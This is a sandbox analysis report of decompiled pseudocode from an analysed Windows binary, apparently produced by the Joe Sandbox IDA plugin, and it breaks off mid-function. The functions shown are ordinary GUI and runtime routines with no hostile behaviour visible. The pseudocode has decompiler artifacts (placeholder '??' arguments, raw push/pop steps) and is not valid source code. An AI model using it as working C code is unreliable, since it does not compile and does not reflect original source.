                                            • Instruction Fuzzy Hash: E91106313003105FD7305FA4EC84B1BBBE9AF59B08F500A2EF596AA2D2CB74B841870C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 65%
                                            			E00420BD9(void* __ecx, signed int _a4) {
                                            				struct HWND__* _t20;
                                            				void* _t23;
                                            				void* _t32;
                                            				void* _t33;
                                            				struct HWND__* _t34;
                                            
                                            				_t33 = __ecx;
                                            				if((E00416528(__ecx) & 0x40000000) == 0) {
                                            					_t32 = E00414DCC(__ecx);
                                            				} else {
                                            					_t32 = __ecx;
                                            				}
                                            				if((_a4 & 0x0000000c) != 0) {
                                            					_t23 = E004166B3(_t32);
                                            					if(( !_a4 & 0x00000008) == 0 || _t23 == 0 || _t32 == _t33) {
                                            						SendMessageA( *(_t32 + 0x1c), 0x86, 0, 0);
                                            					} else {
                                            						 *(_t33 + 0x25) =  *(_t33 + 0x25) | 0x00000002;
                                            						SendMessageA( *(_t32 + 0x1c), 0x86, 1, 0);
                                            						 *(_t33 + 0x25) =  *(_t33 + 0x25) & 0x000000fd;
                                            					}
                                            				}
                                            				_push(5);
                                            				_push(GetDesktopWindow());
                                            				while(1) {
                                            					_t20 = GetWindow();
                                            					_t34 = _t20;
                                            					if(_t34 == 0) {
                                            						break;
                                            					}
                                            					if(E004208E0( *(_t32 + 0x1c), _t34) != 0) {
                                            						SendMessageA(_t34, 0x36d, _a4, 0);
                                            					}
                                            					_push(2);
                                            					_push(_t34);
                                            				}
                                            				return _t20;
                                            			}









                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00420C2F
                                            • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 00420C43
                                            • GetDesktopWindow.USER32 ref: 00420C47
                                            • GetWindow.USER32(00000000), ref: 00420C54
                                            • SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 00420C75
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$DesktopLong
                                            • String ID:
                                            • API String ID: 2272707703-0
                                            • Opcode ID: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
                                            • Instruction ID: c41997b72d8c96214e5640ecb70f441624ebe3089d32e1eab02e12923e6e0a2e
                                            • Opcode Fuzzy Hash: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
                                            • Instruction Fuzzy Hash: AA113A3134072573E3355722AC06F2FBAC89F41B94F95432AB6402A2D3CF59DC42839D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0042153C(intOrPtr __ecx, struct HWND__* _a4, unsigned int _a8) {
                                            				intOrPtr _v8;
                                            				char _v268;
                                            				void* __ebp;
                                            				int _t20;
                                            				unsigned int _t39;
                                            				intOrPtr _t45;
                                            
                                            				_v8 = __ecx;
                                            				_t45 =  *((intOrPtr*)(E00424BFB() + 4));
                                            				if(_t45 != 0 && _a8 != 0) {
                                            					_t39 = _a8 >> 0x10;
                                            					if(_t39 != 0) {
                                            						_t20 =  *(_t45 + 0xb0);
                                            						if(_a8 == _t20 && _t39 ==  *(_t45 + 0xb2)) {
                                            							GlobalGetAtomNameA(_t20,  &_v268, 0x103);
                                            							GlobalAddAtomA( &_v268);
                                            							GlobalGetAtomNameA( *(_t45 + 0xb2),  &_v268, 0x103);
                                            							GlobalAddAtomA( &_v268);
                                            							SendMessageA(_a4, 0x3e4,  *(_v8 + 0x1c), ( *(_t45 + 0xb2) & 0x0000ffff) << 0x00000010 |  *(_t45 + 0xb0) & 0x0000ffff);
                                            						}
                                            					}
                                            				}
                                            				return 0;
                                            			}










                                            APIs
                                            • GlobalGetAtomNameA.KERNEL32 ref: 0042159E
                                            • GlobalAddAtomA.KERNEL32 ref: 004215AD
                                            • GlobalGetAtomNameA.KERNEL32 ref: 004215C3
                                            • GlobalAddAtomA.KERNEL32 ref: 004215CC
                                            • SendMessageA.USER32(?,000003E4,?,?), ref: 004215F0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: AtomGlobal$Name$MessageSend
                                            • String ID:
                                            • API String ID: 1515195355-0
                                            • Opcode ID: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
                                            • Instruction ID: ddc056c18c8f30134593d029485027bb11089ec59ad006056310b0d46243fd91
                                            • Opcode Fuzzy Hash: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
                                            • Instruction Fuzzy Hash: EB119475600319AADB20EB68DC44AEBB3BCEB54700F404456E59697190E7B8EAC1CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 89%
                                            			E004142C3() {
                                            				CHAR* _t35;
                                            				WNDCLASSA* _t37;
                                            				void* _t40;
                                            				void* _t42;
                                            
                                            				E00406520(E00429E28, _t40);
                                            				_t37 =  *(_t40 + 8);
                                            				 *((intOrPtr*)(_t40 - 0x10)) = _t42 - 0x30;
                                            				if(GetClassInfoA(_t37->hInstance, _t37->lpszClassName, _t40 - 0x38) != 0) {
                                            					L5:
                                            					_push(1);
                                            					_pop(0);
                                            					L6:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
                                            					return 0;
                                            				}
                                            				if(RegisterClassA(_t37) != 0) {
                                            					if( *((intOrPtr*)(E00424BFB() + 0x14)) != 0) {
                                            						E00425F56(1);
                                            						 *(_t40 - 4) = 0;
                                            						_t9 = E00424BFB() + 0x34; // 0x34
                                            						_t35 = _t9;
                                            						lstrcatA(_t35, _t37->lpszClassName);
                                            						 *(_t40 + 0xa) = 0xa;
                                            						 *((char*)(_t40 + 0xb)) = 0;
                                            						lstrcatA(_t35, _t40 + 0xa);
                                            						 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
                                            						E00425FC6(1);
                                            					}
                                            					goto L5;
                                            				}
                                            				goto L6;
                                            			}








                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Classlstrcat$H_prologInfoRegister
                                            • String ID:
                                            • API String ID: 106226465-0
                                            • Opcode ID: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
                                            • Instruction ID: 1018f0675467b52ee35bd5ff78e2a168c77a44711dd41a513890d329257c2a90
                                            • Opcode Fuzzy Hash: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
                                            • Instruction Fuzzy Hash: D4112531B04218BECB10AFA5EC41BDE7FB8EF40304F00442BF816A3191C778E6418AA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E00427EF7(void* __ecx, char _a8) {
                                            				struct tagPOINT _v12;
                                            				void* __ebp;
                                            				void* _t15;
                                            				void* _t24;
                                            				void* _t26;
                                            				intOrPtr* _t28;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t26 = __ecx;
                                            				if(_a8 == 1) {
                                            					GetCursorPos( &_v12);
                                            					ScreenToClient( *(_t26 + 0x1c),  &_v12);
                                            					if( *((intOrPtr*)(_t26 + 0xec)) == 2 || E0042799F(_t26, _t24,  &_v12,  &_a8) == 0) {
                                            						_push(LoadCursorA(0, 0x7f00));
                                            					} else {
                                            						_t28 = _t26 + 0x100;
                                            						if( *_t28 == 0) {
                                            							 *_t28 = LoadCursorA( *(E00424BFB() + 0xc), 0x7902);
                                            						}
                                            						_push( *_t28);
                                            					}
                                            					SetCursor();
                                            					_t15 = 0;
                                            				} else {
                                            					_t15 = E004136A7(__ecx);
                                            				}
                                            				return _t15;
                                            			}










                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Cursor$ClientLoadScreen
                                            • String ID:
                                            • API String ID: 120721131-0
                                            • Opcode ID: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
                                            • Instruction ID: 6a5175c3ad254a8bfa5679941e9197540f95af319ead360478e78bd6a32066b2
                                            • Opcode Fuzzy Hash: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
                                            • Instruction Fuzzy Hash: EE019271718214EFDB209FA0DC49E9A77ACEF08315F81442BF94692250D778A981CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041031E(void* _a4, void* _a8) {
                                            				void* _v12;
                                            				DEVMODEA* _t9;
                                            				void* _t20;
                                            				struct HDC__* _t22;
                                            				signed short* _t23;
                                            
                                            				if(_a4 == 0) {
                                            					L5:
                                            					return 0;
                                            				}
                                            				_t23 = GlobalLock(_a4);
                                            				_t20 = _a8;
                                            				if(_t20 == 0) {
                                            					_t9 = 0;
                                            				} else {
                                            					_t9 = GlobalLock(_t20);
                                            				}
                                            				if(_t23 != 0) {
                                            					_t22 = CreateDCA(_t23 + ( *_t23 & 0x0000ffff), _t23 + (_t23[1] & 0x0000ffff), _t23 + (_t23[2] & 0x0000ffff), _t9);
                                            					GlobalUnlock(_v12);
                                            					if(_t20 != 0) {
                                            						GlobalUnlock(_t20);
                                            					}
                                            					return _t22;
                                            				} else {
                                            					goto L5;
                                            				}
                                            			}









                                            APIs
                                            • GlobalLock.KERNEL32 ref: 00410332
                                            • GlobalLock.KERNEL32 ref: 0041033F
                                            • CreateDCA.GDI32(?,?,?,00000000), ref: 00410362
                                            • GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 00410374
                                            • GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 0041037B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Global$LockUnlock$Create
                                            • String ID:
                                            • API String ID: 2536725124-0
                                            • Opcode ID: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
                                            • Instruction ID: 40030820e48ceddce583e067a62accdd91ad43b1dc9828fb23a1b5466954d7d6
                                            • Opcode Fuzzy Hash: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
                                            • Instruction Fuzzy Hash: D0F08C32200225ABC3709B69CC44B67BBDCEF84B91B144826BC98D2210D768DC9596B4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00420766(void* __ecx) {
                                            				struct tagMSG _v28;
                                            				void* _t9;
                                            				void* _t13;
                                            				void* _t25;
                                            
                                            				_t25 = __ecx;
                                            				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
                                            					if(PeekMessageA( &_v28,  *(__ecx + 0x1c), 0x367, 0x367, 3) == 0) {
                                            						PostMessageA( *(_t25 + 0x1c), 0x367, 0, 0);
                                            					}
                                            					if(GetCapture() ==  *(_t25 + 0x1c)) {
                                            						ReleaseCapture();
                                            					}
                                            					_t13 = E00414DCC(_t25);
                                            					 *((intOrPtr*)(_t25 + 0x50)) = 0;
                                            					 *((intOrPtr*)(_t13 + 0x50)) = 0;
                                            					return PostMessageA( *(_t25 + 0x1c), 0x36a, 0, 0);
                                            				}
                                            				return _t9;
                                            			}








                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Message$CapturePost$PeekRelease
                                            • String ID:
                                            • API String ID: 1125932295-0
                                            • Opcode ID: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
                                            • Instruction ID: 6827468c5831c533ec62b3620ea1e9f85116333d279ed9cea6cc2e4bf68413d0
                                            • Opcode Fuzzy Hash: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
                                            • Instruction Fuzzy Hash: 82F0A431600748BFC6306F22EC44D177FBCFF81748B85466EF54192512D736B5068A68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00408E53() {
                                            				void _t10;
                                            				long _t15;
                                            				void* _t16;
                                            
                                            				_t15 = GetLastError();
                                            				_t16 = TlsGetValue( *0x436fb0);
                                            				if(_t16 == 0) {
                                            					_t16 = E00407333(1, 0x74);
                                            					if(_t16 == 0 || TlsSetValue( *0x436fb0, _t16) == 0) {
                                            						E00406490(0x10);
                                            					} else {
                                            						E00408E40(_t16);
                                            						_t10 = GetCurrentThreadId();
                                            						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
                                            						 *_t16 = _t10;
                                            					}
                                            				}
                                            				SetLastError(_t15);
                                            				return _t16;
                                            			}







                                            APIs
                                            • GetLastError.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E55
                                            • TlsGetValue.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E63
                                            • SetLastError.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408EAF
                                              • Part of subcall function 00407333: HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388
                                            • TlsSetValue.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E87
                                            • GetCurrentThreadId.KERNEL32 ref: 00408E98
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue$AllocCurrentHeapThread
                                            • String ID:
                                            • API String ID: 2020098873-0
                                            • Opcode ID: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
                                            • Instruction ID: 621b0a22466fadbf8087ca8eaa5014453414117e276020d1f2dab8d9fe1528b5
                                            • Opcode Fuzzy Hash: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
                                            • Instruction Fuzzy Hash: 4FF0CD32A01612ABC3312B21FD0DA1F3B60EB01BA1715413EF985F62E0CF38980286EC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 47%
                                            			E004239AC(struct tagRECT* _a4, long _a8, signed char _a10) {
                                            				void* __esi;
                                            				void* __ebp;
                                            				int _t13;
                                            				int _t14;
                                            				intOrPtr _t16;
                                            				void* _t19;
                                            				struct tagRECT* _t21;
                                            
                                            				if( *0x439c44 != 0) {
                                            					return AdjustWindowRectEx(_a4, _a8, 0, 0x188);
                                            				}
                                            				if((_a8 & 0x00040600) == 0) {
                                            					_push(GetSystemMetrics(6));
                                            					_push(5);
                                            				} else {
                                            					_push(GetSystemMetrics(0x21));
                                            					_push(0x20);
                                            				}
                                            				_t13 = GetSystemMetrics();
                                            				_t21 = _a4;
                                            				_t14 = InflateRect(_t21, _t13, ??);
                                            				if((_a10 & 0x000000c0) != 0) {
                                            					E00422A19(_t19, _t21);
                                            					_t16 =  *0x439c9c; // 0x0
                                            					_t21->top = _t21->top - _t16;
                                            					return _t16;
                                            				}
                                            				return _t14;
                                            			}











                                            APIs
                                            • AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 004239C6
                                            • GetSystemMetrics.USER32 ref: 004239DF
                                            • GetSystemMetrics.USER32 ref: 004239F3
                                            • InflateRect.USER32(?,00000000), ref: 004239FA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MetricsRectSystem$AdjustInflateWindow
                                            • String ID:
                                            • API String ID: 4080371637-0
                                            • Opcode ID: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
                                            • Instruction ID: e5fc7e5830382d5c46746aa1a576b8dc40ee31b23e133811d6216470331d8181
                                            • Opcode Fuzzy Hash: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
                                            • Instruction Fuzzy Hash: 3DF0C831740328BBDB205F94BD09BAA3B68EF01711F848026BA496B1D0C7F85E91CFD9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004258D4(long* __ecx) {
                                            				long _t4;
                                            				intOrPtr _t5;
                                            				void* _t6;
                                            				void* _t13;
                                            				intOrPtr _t14;
                                            				long* _t15;
                                            
                                            				_t15 = __ecx;
                                            				_t4 =  *__ecx;
                                            				if(_t4 != 0xffffffff) {
                                            					TlsFree(_t4);
                                            				}
                                            				_t1 = _t15 + 0x14; // 0x6b2ac0
                                            				_t5 =  *_t1;
                                            				if(_t5 != 0) {
                                            					do {
                                            						_t2 = _t5 + 4; // 0x0
                                            						_t14 =  *_t2;
                                            						E00425BA0(_t15, _t5, 0);
                                            						_t5 = _t14;
                                            					} while (_t14 != 0);
                                            				}
                                            				_t3 = _t15 + 0x10; // 0x6a00e0
                                            				_t6 =  *_t3;
                                            				if(_t6 != 0) {
                                            					_t13 = GlobalHandle(_t6);
                                            					GlobalUnlock(_t13);
                                            					_t6 = GlobalFree(_t13);
                                            				}
                                            				DeleteCriticalSection(_t15 + 0x1c);
                                            				return _t6;
                                            			}










                                            APIs
                                            • TlsFree.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 004258E0
                                            • GlobalHandle.KERNEL32 ref: 00425908
                                            • GlobalUnlock.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 00425911
                                            • GlobalFree.KERNEL32 ref: 00425918
                                            • DeleteCriticalSection.KERNEL32(00439990,?,?,00425DE1,00000000,00000001), ref: 00425922
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                                            • String ID:
                                            • API String ID: 2159622880-0
                                            • Opcode ID: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
                                            • Instruction ID: 9d5b72b6300baeafbca016f02161f8457eec0fc2b083dcd5d79a1fa835123fe9
                                            • Opcode Fuzzy Hash: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
                                            • Instruction Fuzzy Hash: 4AF05E31700A20DBC630AB39BC0CA2B77BDEF857207D5056AF811D3361DB78DC0686A8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00428BA1(void* __ecx) {
                                            				int _t22;
                                            
                                            				_t22 = SaveDC( *(__ecx + 8));
                                            				if( *(__ecx + 4) == 0) {
                                            					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
                                            				} else {
                                            					SelectObject( *(__ecx + 4), GetStockObject(0xd));
                                            					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _t22;
                                            					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
                                            				}
                                            				return _t22;
                                            			}




                                            APIs
                                            • SaveDC.GDI32(?), ref: 00428BAF
                                            • GetStockObject.GDI32(0000000D), ref: 00428BBC
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428BCC
                                            • SaveDC.GDI32(00000000), ref: 00428BD1
                                            • SelectObject.GDI32(00000000,?), ref: 00428BDE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Object$SaveSelect$Stock
                                            • String ID:
                                            • API String ID: 2785865535-0
                                            • Opcode ID: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
                                            • Instruction ID: 39288a4f9771774ee527ad7dc5e24ccfae81283b4a828b13e1b5aa3fcaf6deb1
                                            • Opcode Fuzzy Hash: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
                                            • Instruction Fuzzy Hash: 05F05871201708AFD7312F66EC44E2BBBA9EB44751B40453EE15682520DB72B816DFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E0041C80F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				struct tagRECT _v44;
                                            				signed int _v48;
                                            				signed int _v52;
                                            				struct tagRECT _v68;
                                            				intOrPtr _t173;
                                            				intOrPtr* _t174;
                                            				intOrPtr _t177;
                                            				signed char _t179;
                                            				intOrPtr* _t181;
                                            				signed char _t185;
                                            				signed int _t187;
                                            				signed int _t188;
                                            				intOrPtr* _t202;
                                            				signed int _t205;
                                            				signed int _t206;
                                            				signed int _t215;
                                            				signed int _t224;
                                            				intOrPtr* _t227;
                                            				intOrPtr* _t232;
                                            				intOrPtr _t233;
                                            				signed int _t250;
                                            				signed int _t252;
                                            				signed int _t256;
                                            				signed int _t260;
                                            				void* _t263;
                                            				signed int _t266;
                                            				signed int _t268;
                                            				intOrPtr _t272;
                                            				signed int _t275;
                                            				signed int _t279;
                                            
                                            				_t263 = __edx;
                                            				_t227 = __ecx;
                                            				_t266 = 0;
                                            				_push(0);
                                            				_push(0);
                                            				_push(0x418);
                                            				_v8 = 0;
                                            				_v52 = 0;
                                            				_v48 = 0;
                                            				_t275 =  *((intOrPtr*)( *__ecx + 0xa0))();
                                            				_v28 = _t275;
                                            				if(_t275 != 0) {
                                            					_t177 = E004131DD(_t275 + _t275 * 4 << 2);
                                            					_v8 = _t177;
                                            					if(_t275 > 0) {
                                            						_v12 = _t177;
                                            						do {
                                            							E0041C295(_t227, _t266, _v12);
                                            							_v12 = _v12 + 0x14;
                                            							_t266 = _t266 + 1;
                                            						} while (_t266 < _t275);
                                            						_t268 = 0;
                                            						if(_t275 > 0) {
                                            							_t179 =  *(_t227 + 0x64);
                                            							if((_t179 & 0x00000002) == 0) {
                                            								_t256 = _t179 & 0x00000004;
                                            								_v44.bottom = _t256;
                                            								if(_t256 == 0) {
                                            									L19:
                                            									_push(_t268);
                                            									asm("sbb eax, eax");
                                            									_t215 =  ~(_a8 & 0x00000002) & 0x00007fff;
                                            									__eflags = _t215;
                                            									_push(_t215);
                                            								} else {
                                            									if((_a8 & 0x00000004) != 0) {
                                            										L18:
                                            										_push(_t268);
                                            										_push( *((intOrPtr*)(_t227 + 0x54)));
                                            									} else {
                                            										if((_a8 & 0x00000008) == 0) {
                                            											__eflags = _a8 & 0x00000010;
                                            											if((_a8 & 0x00000010) == 0) {
                                            												__eflags = _a12 - 0xffffffff;
                                            												if(_a12 == 0xffffffff) {
                                            													__eflags = _t179 & 0x00000001;
                                            													if((_t179 & 0x00000001) == 0) {
                                            														goto L19;
                                            													} else {
                                            														goto L18;
                                            													}
                                            												} else {
                                            													SetRectEmpty( &_v44);
                                            													E0041F52D(_t227,  &_v44, _a8 & 0x00000002);
                                            													_t224 = _a8 & 0x00000020;
                                            													__eflags = _t224;
                                            													if(_t224 == 0) {
                                            														_t260 = _v44.right - _v44.left;
                                            														__eflags = _t260;
                                            													} else {
                                            														_t260 = _v44.bottom - _v44.top;
                                            													}
                                            													_push(_t224);
                                            													_push(_t260 + _a12);
                                            												}
                                            											} else {
                                            												_push(0);
                                            												_push(0);
                                            											}
                                            										} else {
                                            											_push(0);
                                            											_push(0x7fff);
                                            										}
                                            									}
                                            								}
                                            								_push(_t275);
                                            								_push(_v8);
                                            								E0041C6B2(_t227, _t263);
                                            							}
                                            							_push(_t275);
                                            							_push(_v8);
                                            							_push( &(_v44.right));
                                            							_t181 = E0041C4B6(_t227);
                                            							_v52 =  *_t181;
                                            							_v48 =  *((intOrPtr*)(_t181 + 4));
                                            							if((_a8 & 0x00000040) != 0) {
                                            								 *(_t227 + 0x84) =  *(_t227 + 0x84) & 0x00000000;
                                            								_v20 = _t268;
                                            								_v44.bottom =  *(_t227 + 0x84);
